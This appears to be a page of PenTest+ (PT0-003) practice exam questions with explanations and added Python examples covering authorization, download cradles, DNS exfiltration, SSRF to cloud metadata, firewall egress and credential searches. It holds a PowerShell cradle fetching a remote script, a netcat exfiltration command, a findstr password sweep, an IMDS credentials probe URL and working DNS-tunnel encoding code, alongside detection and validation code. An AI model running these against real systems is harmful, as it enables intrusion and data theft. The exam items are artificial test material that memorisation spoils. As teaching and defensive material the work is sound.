Practice Free PT0-003 Exam Online Questions
Which of the following authorizations is mandatory when a penetration tester is involved in a complex IT infrastructure?
- A . Customer authorization
- B . Penetration tester authorization
- C . Third-party authorization
- D . Internal team authorization
A
Explanation:
Before any penetration testing begins ― especially in a complex IT infrastructure involving multiple systems, cloud environments, and potentially shared platforms ― a formal written authorization from the customer (client organization) is mandatory.
This authorization defines the scope, targets, timeframes, and limitations of the assessment and ensures legal protection for both the tester and the organization. Conducting testing without explicit client authorization could violate laws (e.g., Computer Fraud and Abuse Act in the U.S.) and corporate policies.
Why not the others:
B. Penetration tester authorization: The tester cannot authorize their own actions; authorization must come from the system owner.
C. Third-party authorization: Only relevant if the third party owns the infrastructure; otherwise, it’s not mandatory.
D. Internal team authorization: Internal teams may coordinate logistics, but legal authorization must come from the customer/asset owner.
CompTIA PT0-003 Objective Mapping:
Domain 1.0: Planning and Scoping
Given the following script:
$1 = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name.split("\")[1]
If ($1 -eq "administrator") {
    echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.11.12:8080/ul/windows.ps1') | powershell -noprofile -
}
Which of the following is the penetration tester most likely trying to do?
- A . Change the system’s wallpaper based on the current user’s preferences.
- B . Capture the administrator’s password and transmit it to a remote server.
- C . Conditionally stage and execute a remote script.
- D . Log the internet browsing history for a systems administrator.
C
Explanation:
Script Breakdown:
$1 = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name.split("\")[1]: GetCurrent().Name returns the account in DOMAIN\user form; splitting on the backslash and taking index [1] leaves only the username.
If ($1 -eq "administrator"): Compares that username with "administrator". PowerShell's -eq is case-insensitive for strings, so "Administrator" also matches. This is a name check only; it does not inspect the token's group membership or whether the process is elevated.
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.11.12:8080/ul/windows.ps1') | powershell -noprofile -: Emits the text IEX(...) and pipes it into a new powershell process that reads its commands from standard input (the trailing -). That child process downloads windows.ps1 from 10.10.11.12:8080 and runs it in memory with Invoke-Expression; nothing is written to disk.
Purpose:
Conditional Execution: The download and execution happen only when the script is run by the administrator account.
Remote Script Execution: IEX(New-Object Net.WebClient).DownloadString(...) is the classic PowerShell download cradle for pulling a second-stage payload from an attacker-controlled host.
Why This is the Best Choice:
The visible code stages and executes a remote script conditionally, based on who is running it. Nothing in it captures credentials (B), changes wallpaper settings (A) or reads browsing history (D). What the downloaded windows.ps1 does is not shown, so the only conclusion the snippet supports is a conditional stager.
Reference from Pentesting Literature:
Conditionally executing code based on the current user, and staging payloads with a download cradle, are covered in standard penetration testing texts and appear in many HTB write-ups.
Reference: Penetration Testing: A Hands-On Introduction to Hacking (Georgia Weidman); HTB official write-ups.
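The detection side of the script above is what a blue team would want from this question. The following is an added example, not code from the exam or its references: it runs a set of download-cradle indicators over constructed PowerShell script-block text (the kind of content that Script Block Logging, Event ID 4104, records) and reports whether a block looks like a cradle. The sample blocks, indicator names and thresholds are assumptions for the example.

```python
import re

# Constructed sample script-block texts (not from the page): the exam's conditional
# stager, a benign administrative one-liner, and a case-mangled cradle variant.
SAMPLE_SCRIPT_BLOCKS = {
    "stager": (
        '$1 = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name.split("\\")[1]\n'
        'If ($1 -eq "administrator") {\n'
        "echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.11.12:8080/ul/windows.ps1') | powershell -noprofile -\n"
        "}"
    ),
    "benign": "Get-Service | Where-Object { $_.Status -eq 'Running' } | Export-Csv services.csv",
    "obfuscated": "iex (nEw-oBjEcT nEt.wEbClIeNt).dOwNlOaDsTrInG('http://10.10.11.12/x')",
}

# Indicator patterns. All case-insensitive, because PowerShell is.
INDICATORS = {
    # string-to-code execution
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    # fetching content over HTTP from inside the script
    "web_download": re.compile(
        r"net\.webclient|downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I),
    # any embedded URL (captured for triage)
    "remote_url": re.compile(r"https?://[^\s'\"]+", re.I),
    # who-am-I check that gates the payload
    "identity_check": re.compile(r"WindowsIdentity\]::GetCurrent\(\)", re.I),
    # piping generated text into a fresh powershell reading stdin ("powershell ... -")
    "stdin_powershell": re.compile(r"\|\s*powershell(?:\.exe)?\s+(?:-\w+\s+)*-\s*$", re.I | re.M),
}


def detect_download_cradle(script: str) -> dict:
    """Return which indicators fire, the URLs seen, and a cradle verdict.

    A download cradle needs both halves: code execution from a string and a
    remote fetch. The other indicators add context but do not decide by themselves.
    """
    hits = {name: bool(pattern.search(script)) for name, pattern in INDICATORS.items()}
    urls = INDICATORS["remote_url"].findall(script)
    is_cradle = hits["invoke_expression"] and hits["web_download"]
    return {
        "is_cradle": is_cradle,
        "indicators": [name for name, hit in hits.items() if hit],
        "urls": urls,
    }


if __name__ == "__main__":
    for label, block in SAMPLE_SCRIPT_BLOCKS.items():
        print(label, detect_download_cradle(block))
```

The regexes are deliberately simple so that the logic is readable; real deployments also look for encoded commands (-EncodedCommand, FromBase64String) and string concatenation that splits the keywords, which is why Script Block Logging, which records the de-obfuscated script text, is the right data source for this check.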
Which of the following protocols would a penetration tester most likely utilize to exfiltrate data covertly and evade detection?
- A . FTP
- B . HTTPS
- C . SMTP
- D . DNS
D
Explanation:
Covert data exfiltration is a crucial aspect of advanced penetration testing. Penetration testers often need to move data out of a network without being detected by the organization’s security monitoring tools.
Here’s a breakdown of the potential methods and why DNS is the preferred choice for covert data exfiltration:
FTP (File Transfer Protocol) (Option A):
Characteristics: FTP is a clear-text protocol used to transfer files.
Drawbacks: It is easily detected by network security tools due to its lack of encryption and distinctive traffic patterns. Most modern networks block or heavily monitor FTP traffic to prevent unauthorized file transfers.
Reference: The use of FTP in penetration testing is often limited to environments where encryption is not a concern or for internal transfers where monitoring is lax. It’s rarely used for covert exfiltration due to its high detectability.
HTTPS (Hypertext Transfer Protocol Secure) (Option B):
Characteristics: HTTPS encrypts data in transit, making it harder to inspect by network monitoring tools.
Drawbacks: While HTTPS is more secure, large amounts of unusual or unexpected HTTPS traffic can still trigger alerts on sophisticated security systems. Its usage for exfiltration depends on the network’s normal traffic patterns and the ability to blend in.
Reference: HTTPS is used when there is a need to encrypt data during exfiltration. However, it can still be flagged by traffic analysis tools if the data patterns or destinations are unusual.
SMTP (Simple Mail Transfer Protocol) (Option C):
Characteristics: SMTP is used for sending emails.
Drawbacks: Like FTP, SMTP is not inherently secure and can be monitored. Additionally, large or frequent email attachments can trigger alerts.
Reference: SMTP might be used in some exfiltration scenarios but is generally considered risky due to the ease of monitoring email traffic.
DNS (Domain Name System) (Option D):
Characteristics: DNS resolves names to addresses and is needed by almost every host, so outbound DNS is nearly always permitted and frequently not logged per query.
Advantages: Data can be encoded into the subdomain labels of queries for an attacker-controlled domain (and into TXT or other answer records for the return path). Because the traffic is ubiquitous and small per packet, it blends in far better than a bulk transfer over FTP or SMTP, or a large HTTPS upload to an unfamiliar destination.
Reference: Penetration tests and red team engagements commonly use DNS tunneling for covert exfiltration because outbound DNS is rarely blocked and is often not inspected by egress controls that concentrate on HTTP(S) and file-transfer protocols.
Drawbacks: DNS tunneling is covert, not invisible. It is slow (tens of bytes per query), and a defender who collects resolver logs can spot it through unusually long or high-entropy labels, a very large number of unique subdomains under one domain, spikes in NXDOMAIN responses or TXT queries, and hosts talking to resolvers other than the internal ones. Forcing all egress DNS through internal resolvers and monitoring those logs is the matching defensive control.
Conclusion: Among the four options, DNS is the channel most likely to pass unnoticed because it rides on traffic every host generates and that many organizations do not inspect. The other three are either cleartext and easy to filter (FTP, SMTP) or produce destinations and volumes that stand out (HTTPS).
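The two halves of the DNS discussion above, the encoding that makes the channel work and the log heuristics that give it away, are concrete enough to show in code. This is an added example, not from the exam or any cited source: it chunks a constructed secret into RFC 1035-compliant query names under a made-up attacker domain, reassembles it from the observed queries, and applies the label-length and entropy heuristic a resolver-log monitor would use. The secret, the domain exfil.example and the thresholds are assumptions.

```python
import base64
import math
from collections import Counter

MAX_LABEL = 63   # RFC 1035: a label is at most 63 octets
MAX_NAME = 253   # practical maximum for a name in presentation format

# Constructed secret and attacker-controlled domain (assumptions for this example).
SECRET = b"username=svc_backup\npassword=Winter2024!\nhost=db01.corp.example\n" * 4
EXFIL_DOMAIN = "exfil.example"


def encode_for_dns(data: bytes, domain: str, seq_width: int = 4) -> list:
    """Encode bytes into query names of the form <seq>.<chunk labels>.<domain>.

    base32 rather than base64: DNS names are case-insensitive and resolvers may
    rewrite case in transit. Padding is stripped here and restored on decode.
    """
    text = base64.b32encode(data).decode().rstrip("=").lower()
    budget = MAX_NAME - len(domain) - seq_width - 2        # room left for data labels
    labels_per_query = budget // (MAX_LABEL + 1)           # each label costs 63 + a dot
    chunk = labels_per_query * MAX_LABEL
    names = []
    for seq, start in enumerate(range(0, len(text), chunk)):
        piece = text[start:start + chunk]
        labels = [piece[i:i + MAX_LABEL] for i in range(0, len(piece), MAX_LABEL)]
        names.append(".".join([f"{seq:0{seq_width}d}", *labels, domain]))
    return names


def decode_from_dns(names: list, domain: str) -> bytes:
    """Reassemble the payload from observed queries; order-independent thanks to seq."""
    pieces = {}
    for name in names:
        sub = name[: -(len(domain) + 1)]                  # drop ".<domain>"
        seq, *labels = sub.split(".")
        pieces[int(seq)] = "".join(labels)
    text = "".join(pieces[k] for k in sorted(pieces)).upper()
    text += "=" * (-len(text) % 8)                         # restore base32 padding
    return base64.b32decode(text)


def shannon_entropy(s: str) -> float:
    if not s:
        return 0.0
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def is_suspicious_name(name: str, max_label: int = 50,
                       min_len: int = 30, min_entropy: float = 4.0) -> bool:
    """Resolver-log heuristic: very long labels, or long high-entropy text below the
    registrable domain (approximated here as the last two labels)."""
    labels = name.rstrip(".").split(".")
    if any(len(label) >= max_label for label in labels):
        return True
    sub = "".join(labels[:-2])
    return len(sub) >= min_len and shannon_entropy(sub) >= min_entropy


if __name__ == "__main__":
    queries = encode_for_dns(SECRET, EXFIL_DOMAIN)
    for q in queries:
        print(len(q), is_suspicious_name(q), q[:60] + "...")
    assert decode_from_dns(queries, EXFIL_DOMAIN) == SECRET
```

Note the throughput: 256 bytes of secret cost three queries of roughly 190 payload characters each, which is why DNS exfiltration of anything large produces the query volume that defenders key on. On the detection side, the per-name heuristic is only one signal; counting unique subdomains per registrable domain over a time window catches tunnels that keep labels short.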
Which of the following will reduce the possibility of introducing errors or bias in a penetration test report?
- A . Secure distribution
- B . Peer review
- C . Use AI
- D . Goal reprioritization
B
Explanation:
A peer review process ensures that a penetration test report is accurate, unbiased, and free from errors.
Peer review (Option B):
Senior security professionals verify findings, risk levels, and remediation recommendations.
Reduces the risk of misinterpretation or incorrect data in reports.
Reference: CompTIA PenTest+ PT0-003 Official Study Guide – "Best Practices for Penetration Testing Reports"
Incorrect options:
Option A (Secure distribution): Ensures confidentiality, but does not reduce report errors.
Option C (Use AI): AI can assist in analysis, but human verification is essential.
Option D (Goal reprioritization): Changes testing objectives, not report accuracy.
A penetration tester is performing a cloud-based penetration test against a company. Stakeholders have indicated the priority is to see if the tester can get into privileged systems that are not directly accessible from the internet.
Given the following scanner information:
Server-side request forgery (SSRF) vulnerability in test.comptia.org
Reflected cross-site scripting (XSS) vulnerability in test2.comptia.org
Publicly accessible storage system named static_comptia_assets
SSH port 22 open to the internet on test3.comptia.org
Open redirect vulnerability in test4.comptia.org
Which of the following attack paths should the tester prioritize first?
- A . Synchronize all the information from the public bucket and scan it with Trufflehog.
- B . Run Pacu to enumerate permissions and roles within the cloud-based systems.
- C . Perform a full dictionary brute-force attack against the open SSH service using Hydra.
- D . Use the reflected cross-site scripting attack within a phishing campaign to attack administrators.
- E . Leverage the SSRF to gain access to credentials from the metadata service.
E
Explanation:
Leverage SSRF for Metadata Access:
A server-side request forgery (SSRF) vulnerability lets the tester make the vulnerable server issue requests on their behalf to addresses the tester cannot reach directly. In cloud environments the most valuable such address is the instance metadata service (AWS EC2 IMDS at 169.254.169.254; Azure and GCP serve their metadata at the same link-local address, though they require a custom request header), which hands out temporary credentials for the role attached to the instance. Where the IMDSv1-style GET interface is reachable, a single request to the security-credentials path returns an access key, secret key and session token.
Those credentials are then used from the tester's own machine with the cloud CLI or SDK, which is exactly the route to privileged systems that are not exposed to the internet. If the instance enforces IMDSv2 (a session token obtained with an HTTP PUT, which most SSRF primitives cannot issue), a plain SSRF GET returns nothing useful and the tester should record that as a positive finding.
Why Not Other Options?
A (Public bucket): Syncing static_comptia_assets and scanning it with Trufflehog can turn up hard-coded secrets, but a bucket named for static web assets is a long shot compared with a confirmed SSRF, and its contents do not by themselves give access to internal systems.
B (Pacu): Pacu enumerates and exploits AWS once you have credentials; without them there is nothing to run it with. The SSRF is how those credentials are obtained, so Pacu is the natural second step, not the first.
C (SSH brute force): Brute-forcing SSH with Hydra is noisy, slow, likely to trigger lockouts or alerts, and aimed at one internet-facing host rather than at the privileged internal systems the stakeholders care about.
D (Phishing via XSS): Reflected XSS plus a phishing campaign depends on an administrator clicking a link, takes time to set up and yields a browser session at best; it is far less direct than the SSRF path.
CompTIA PenTest+ Reference: Domain 3.0 (Attacks and Exploits), SSRF exploitation and cloud metadata access techniques.
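The explanation above describes the attack; the check a developer would want is the deny-by-default URL validation that keeps a user-supplied URL from reaching the metadata service. The following is an added example, not from the exam or any cloud provider's documentation. It validates the scheme, resolves the host, and rejects metadata endpoints, link-local, private and other non-global addresses, including the bare-integer and IPv4-mapped IPv6 encodings attackers use to slip past naive string filters. The metadata hostname list, the constructed resolver table and the example addresses are assumptions; the 169.254.169.254 and fd00:ec2::254 endpoints are the documented AWS IMDS addresses.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Metadata endpoints an SSRF is typically aimed at. AWS, Azure, GCP and OpenStack all
# serve metadata on 169.254.169.254; AWS also serves IMDS on fd00:ec2::254.
METADATA_IPS = {ipaddress.ip_address(a) for a in ("169.254.169.254", "fd00:ec2::254")}
# Hostnames that resolve to metadata without going through public DNS (assumed list;
# extend for your provider).
METADATA_HOSTS = {"metadata.google.internal", "metadata", "instance-data"}


def system_resolver(host: str) -> list:
    """Resolve with the OS resolver, i.e. what the vulnerable server itself would use."""
    return [ipaddress.ip_address(info[4][0]) for info in socket.getaddrinfo(host, None)]


def make_static_resolver(table: dict):
    """Resolver backed by a constructed name->addresses table, so the check runs offline."""
    def resolve(host: str) -> list:
        if host not in table:
            raise OSError(f"constructed NXDOMAIN for {host}")
        return [ipaddress.ip_address(a) for a in table[host]]
    return resolve


def ssrf_target_allowed(url: str, resolver=system_resolver) -> tuple:
    """Deny-by-default check to run before fetching a user-supplied URL.

    Returns (allowed, reason). Only http/https are permitted; the host is resolved
    and every address must be publicly routable and not a metadata endpoint.
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, f"scheme {parts.scheme!r} not permitted"   # no file://, gopher://, ...
    host = (parts.hostname or "").lower().rstrip(".")
    if not host:
        return False, "no host in URL"
    if host in METADATA_HOSTS:
        return False, f"{host} is a metadata hostname"
    try:
        # Accept dotted-quad, IPv6, and the bare-integer form (http://2852039166/) that
        # libc's inet_aton would silently turn into 169.254.169.254.
        addrs = [ipaddress.ip_address(int(host) if host.isdigit() else host)]
    except ValueError:
        try:
            addrs = resolver(host)
        except OSError as exc:
            return False, f"resolution failed: {exc}"
    for addr in addrs:
        if addr.version == 6 and addr.ipv4_mapped:
            addr = addr.ipv4_mapped          # ::ffff:169.254.169.254 -> 169.254.169.254
        if addr in METADATA_IPS:
            return False, f"{addr} is a metadata endpoint"
        if not addr.is_global:
            return False, f"{addr} is not a publicly routable address"
    return True, "ok"


if __name__ == "__main__":
    # AWS IMDSv1 credential path, used here only as the classic probe target.
    probe = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
    print(ssrf_target_allowed(probe))
    print(ssrf_target_allowed("https://example.com/", make_static_resolver(
        {"example.com": ["93.184.216.34"]})))
```

Two caveats belong with this check. First, validate-then-fetch is racy against DNS rebinding: the fetch should connect to the address that was validated, not re-resolve the name. Second, this is the application-layer control; the platform-layer one is requiring IMDSv2 (token via PUT, hop limit of 1) so that an SSRF GET cannot obtain credentials even if validation fails.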
A tester enumerated a firewall policy and now needs to stage and exfiltrate data captured from the engagement.
Given the following firewall policy:
Action | SRC                        | DEST                   | Proto
Block  | 192.168.10.0/24 : 1-65535  | 10.0.0.0/24 : 22       | TCP
Allow  | 0.0.0.0/0 : 1-65535        | 192.168.10.0/24 : 443  | TCP
Allow  | 192.168.10.0/24 : 1-65535  | 0.0.0.0/0 : 443        | TCP
Block  | *                          | *                      | *
Which of the following commands should the tester try next?
- A . tar -zcvf /tmp/data.tar.gz /path/to/data && nc -w 3 <remote_server> 443 < /tmp/data.tar.gz
- B . gzip /path/to/data && cp data.gz <remote_server> 443
- C . gzip /path/to/data && nc -nvlk 443; cat data.gz | nc -w 3 <remote_server> 22
- D . tar -zcvf /tmp/data.tar.gz /path/to/data && scp /tmp/data.tar.gz <remote_server>
A
Explanation:
Given the firewall policy, let's analyze the commands provided and determine which one is suitable for exfiltrating data through the allowed network traffic. The firewall policy rules, evaluated top-down with first match winning, are:
Block: Traffic from 192.168.10.0/24 to 10.0.0.0/24 on port 22 (TCP).
Allow: All traffic (0.0.0.0/0) to 192.168.10.0/24 on port 443 (TCP).
Allow: Traffic from 192.168.10.0/24 to anywhere on port 443 (TCP).
Block: All other traffic (*).
Breakdown of Options:
Option A: tar -zcvf /tmp/data.tar.gz /path/to/data && nc -w 3 <remote_server> 443 < /tmp/data.tar.gz
Compresses the data into a tar.gz archive and pushes it with netcat to the remote server on TCP 443. The third rule allows any TCP connection from 192.168.10.0/24 to any destination on port 443, so if the tester's host sits in that subnet this is the only option whose connection the firewall permits. Two caveats: nc sends raw bytes, not TLS, so a protocol-aware proxy or TLS-inspecting device on the 443 path will see non-TLS traffic (wrapping the transfer with ncat --ssl or openssl s_client avoids that); and -w 3 is only an idle timeout, so a listener on the remote side (for example nc -l 443 > data.tar.gz) must be running before the command is issued.
Option B: gzip /path/to/data && cp data.gz <remote_server> 443
cp is a local file-copy utility; it has no notion of a remote host or a port, so this is not a network transfer at all. (gzip also writes data.gz beside the source file, not in the current directory.)
Option C: gzip /path/to/data && nc -nvlk 443; cat data.gz | nc -w 3 <remote_server> 22
nc -nvlk 443 starts a listener on 443 that keeps accepting connections (-k), so the cat after the semicolon never runs until the listener is killed. Even if it did, a connection to <remote_server> on port 22 matches neither Allow rule and falls through to the final Block. Note that the explicit first rule only blocks SSH towards 10.0.0.0/24; it is the default deny that stops this one.
Option D: tar -zcvf /tmp/data.tar.gz /path/to/data && scp /tmp/data.tar.gz <remote_server>
scp rides on SSH, which uses TCP 22 by default, and no Allow rule matches outbound 22, so the default Block applies. The command is also malformed: without a colon after the host name, scp treats <remote_server> as a local path and simply copies the archive to a local file of that name.
Reference from Pentest:
Gobox HTB: The Gobox write-up emphasizes the use of proper enumeration and leveraging allowed services for exfiltration. Specifically, using tools like nc for data transfer over allowed ports, similar to the method in Option A.
Forge HTB: This write-up also illustrates how to handle firewall restrictions by exfiltrating data through allowed ports and protocols, emphasizing understanding firewall rules and using appropriate commands like curl and nc.
Horizontall HTB: Highlights the importance of using allowed services and ports for data exfiltration. The approach taken in Option A aligns with the techniques used in these practical scenarios where nc is used over an allowed port.
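Reading a policy table by eye is error-prone, which is how the "port 22 is blocked" shortcut in explanations like the one above arises (it is the default deny, not the first rule, that stops outbound SSH to the remote server). The following is an added example, not from the exam or the cited write-ups: a small first-match evaluator loaded with the page's four rules, run over the connection each answer option would open. The tester's address 192.168.10.50, the remote server 203.0.113.10, the ephemeral source ports and the reading of "*" as any address, any port and any protocol are assumptions.

```python
import ipaddress

# The question's policy as first-match rules, top-down. "*" in the last rule is read as
# any address, any port, any protocol (assumption about the table's notation).
POLICY = [
    # action, src network,        src ports,   dst network,        dst ports,  proto
    ("block", "192.168.10.0/24", (1, 65535), "10.0.0.0/24",      (22, 22),   "tcp"),
    ("allow", "0.0.0.0/0",       (1, 65535), "192.168.10.0/24",  (443, 443), "tcp"),
    ("allow", "192.168.10.0/24", (1, 65535), "0.0.0.0/0",        (443, 443), "tcp"),
    ("block", "0.0.0.0/0",       (1, 65535), "0.0.0.0/0",        (1, 65535), "*"),
]


def evaluate(policy, src_ip, src_port, dst_ip, dst_port, proto):
    """Return (action, index of the rule that matched). First match wins; if nothing
    matches, fall back to an implicit deny with index None."""
    src = ipaddress.ip_address(src_ip)
    dst = ipaddress.ip_address(dst_ip)
    for index, (action, snet, sports, dnet, dports, p) in enumerate(policy):
        if p != "*" and p != proto.lower():
            continue
        if src not in ipaddress.ip_network(snet) or dst not in ipaddress.ip_network(dnet):
            continue
        if not (sports[0] <= src_port <= sports[1] and dports[0] <= dst_port <= dports[1]):
            continue
        return action, index
    return "block", None


# The connection each answer option would open, plus two extra probes (constructed).
CANDIDATES = {
    "A: nc <remote> 443":          ("192.168.10.50", 51000, "203.0.113.10", 443, "tcp"),
    "C: nc <remote> 22":           ("192.168.10.50", 51001, "203.0.113.10", 22,  "tcp"),
    "D: scp <remote> (ssh/22)":    ("192.168.10.50", 51002, "203.0.113.10", 22,  "tcp"),
    "ssh into 10.0.0.0/24":        ("192.168.10.50", 51003, "10.0.0.7",     22,  "tcp"),
    "udp dns out":                 ("192.168.10.50", 51004, "203.0.113.53", 53,  "udp"),
}


def verdicts(policy=POLICY, candidates=CANDIDATES) -> dict:
    """Map each candidate to the action the policy takes on it."""
    return {name: evaluate(policy, *conn)[0] for name, conn in candidates.items()}


if __name__ == "__main__":
    for name, conn in CANDIDATES.items():
        action, index = evaluate(POLICY, *conn)
        print(f"{name:28s} -> {action:5s} (rule {index})")
```

Running it shows the distinction the explanation glosses over: the SSH attempt to 10.0.0.7 hits rule 0, while SSH to the external server hits rule 3, the default deny. It also makes the egress picture explicit: from this subnet, TCP 443 to anywhere is the only outbound path, so the DNS channel discussed earlier is closed here too.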
During an assessment, a penetration tester obtains a low-privilege shell and then runs the following command:
findstr /SIM /C:"pass" *.txt *.cfg *.xml
Which of the following is the penetration tester trying to enumerate?
- A . Configuration files
- B . Permissions
- C . Virtual hosts
- D . Secrets
D
Explanation:
By running the command findstr /SIM /C:"pass" *.txt *.cfg *.xml, the penetration tester is trying to enumerate secrets.
Command Analysis:
findstr: A command-line utility in Windows used to search for specific strings in files.
/SIM: Three switches combined. /S searches the current directory and all subdirectories, /I makes the match case-insensitive, and /M prints only the names of files that contain a match rather than the matching lines, so the output is a list of candidate files to open next.
/C:"pass": Searches for the literal string "pass", which also matches longer words such as "password", "passwd" and "passphrase".
*.txt *.cfg *.xml: The file name patterns to search; findstr expands each pattern itself.
Objective:
The command is searching for the string "pass" within .txt, .cfg, and .xml files, which is indicative of searching for passwords or other sensitive information (secrets).
These file types commonly contain configuration details, credentials, and other sensitive data that might include passwords or secrets.
Other Options:
Configuration files: While .cfg and .xml files can be configuration files, the specific search for "pass" indicates looking for secrets like passwords.
Permissions: This command does not check or enumerate file permissions.
Virtual hosts: This command is not related to enumerating virtual hosts.
Pentest Reference:
Post-Exploitation: Enumerating sensitive information like passwords is a common post-exploitation activity after gaining initial access.
Credential Discovery: Searching for stored credentials within configuration files and documents to escalate privileges or move laterally within the network.
By running this command, the penetration tester aims to find stored passwords or other secrets that could help in further exploitation of the target system.
Which of the following frameworks can be used to classify threats?
- A . PTES
- B . STRIDE
- C . OSSTMM
- D . OCTAVE
B
Explanation:
STRIDE is a threat classification model created by Microsoft that breaks down threats into six categories:
Spoofing
Tampering
Repudiation
Information disclosure
Denial of Service
Elevation of privilege
It is specifically designed for threat modeling.
PTES is a general pentesting methodology.
OSSTMM is a framework for operational security testing.
OCTAVE is a risk assessment methodology, not focused on threat classification.
Reference: PT0-003 Objective 3.1: Understand and apply threat modeling methodologies like STRIDE.
A penetration tester needs to test a very large number of URLs for public access.
Given the following code snippet:
1 import requests
2 import pathlib
3
4 for url in pathlib.Path("urls.txt").read_text().split("\n"):
5 response = requests.get(url)
6 if response.status == 401:
7 print("URL accessible")
Which of the following changes is required?
- A . The condition on line 6
- B . The method on line 5
- C . The import on line 1
- D . The delimiter in line 3
A
Explanation:
Script Analysis:
Line 1: import requests – Imports the requests library to handle HTTP requests.
Line 2: import pathlib – Imports the pathlib library to handle file paths.
Line 4: for url in pathlib.Path("urls.txt").read_text().split("\n"): – Reads the urls.txt file, splits its contents on newlines, and iterates over each URL.
Line 5: response = requests.get(url) – Sends a GET request to the URL and stores the response.
Line 6: if response.status == 401: – Checks if the response status code is 401 (Unauthorized).
Line 7: print("URL accessible") – Prints a message indicating the URL is accessible.
Error Identification:
The condition if response.status == 401: is wrong for determining whether a URL is publicly accessible: a 401 status code means the resource requires authentication, which is the opposite of public. The attribute name is also wrong for this library: requests exposes the code as response.status_code (response.status is the name used by http.client and urllib responses), so line 6 would raise an AttributeError before ever comparing anything.
Correct Condition:
The condition should test for a 200 status code, which indicates the request succeeded and the resource was served without authentication.
Corrected Script:
Replace if response.status == 401: with if response.status_code == 200: to correctly identify publicly accessible URLs.
Pentest Reference: In penetration testing, checking the accessibility of multiple URLs is a common task, often part of reconnaissance. Identifying publicly accessible resources can reveal potential entry points for further testing.
The requests library in Python is widely used for making HTTP requests and handling responses.
Understanding HTTP status codes is crucial for correctly interpreting the results of these requests.
By changing the condition to check for a 200 status code, the script will correctly identify and print URLs that are publicly accessible.
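Fixing line 6 makes the snippet run, but a "very large number of URLs" also needs the things the exam snippet omits: skipping blank lines (the trailing newline in urls.txt yields an empty string the original would pass to requests.get), timeouts, not following redirects to a login page and counting them as 200, and surviving a single unreachable host. The following is an added example, not the exam's code: the fetch is injectable so the sweep can be exercised offline against a constructed URL list and status table; the URLs under app.example are assumptions.

```python
# Constructed stand-in for urls.txt (assumption), including the blank line that a
# trailing newline produces and that the original loop would hand to requests.get().
URL_LIST = (
    "https://app.example/public/\n"
    "https://app.example/admin/\n"
    "\n"
    "https://app.example/api/health\n"
    "https://app.example/down\n"
)


def classify(status_code: int) -> str:
    """Map an HTTP status code to what it means for a public-access check."""
    if 200 <= status_code < 300:
        return "accessible"          # the condition the original script should test
    if status_code in (401, 407):
        return "auth required"       # what the original mistakenly treated as accessible
    if status_code == 403:
        return "forbidden"
    if status_code in (301, 302, 303, 307, 308):
        return "redirect"            # often a bounce to a login page; not public content
    if status_code >= 500:
        return "server error"
    return f"other ({status_code})"


def requests_fetch(url: str, timeout: float = 5.0) -> int:
    """Fetch with the page's library. The attribute is status_code, not status."""
    import requests   # imported here so the module loads even where requests is absent
    return requests.get(url, timeout=timeout, allow_redirects=False).status_code


def check_urls(url_text: str, fetch=requests_fetch) -> dict:
    """Return {url: classification} for every non-blank line without aborting the sweep."""
    results = {}
    for line in url_text.split("\n"):       # "\n" (a newline), not the letter n
        url = line.strip()
        if not url:
            continue                        # blank line from the trailing newline
        try:
            results[url] = classify(fetch(url))
        except Exception as exc:            # one dead host must not stop a large sweep
            results[url] = f"error: {type(exc).__name__}"
    return results


if __name__ == "__main__":
    for url, verdict in check_urls(URL_LIST).items():
        print(f"{verdict:16s} {url}")
```

Keeping the classification separate from the fetch is what makes the sweep testable and also what lets the report distinguish "public" from "redirects to SSO" and "requires credentials", which an exam-style 200/401 check lumps together.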
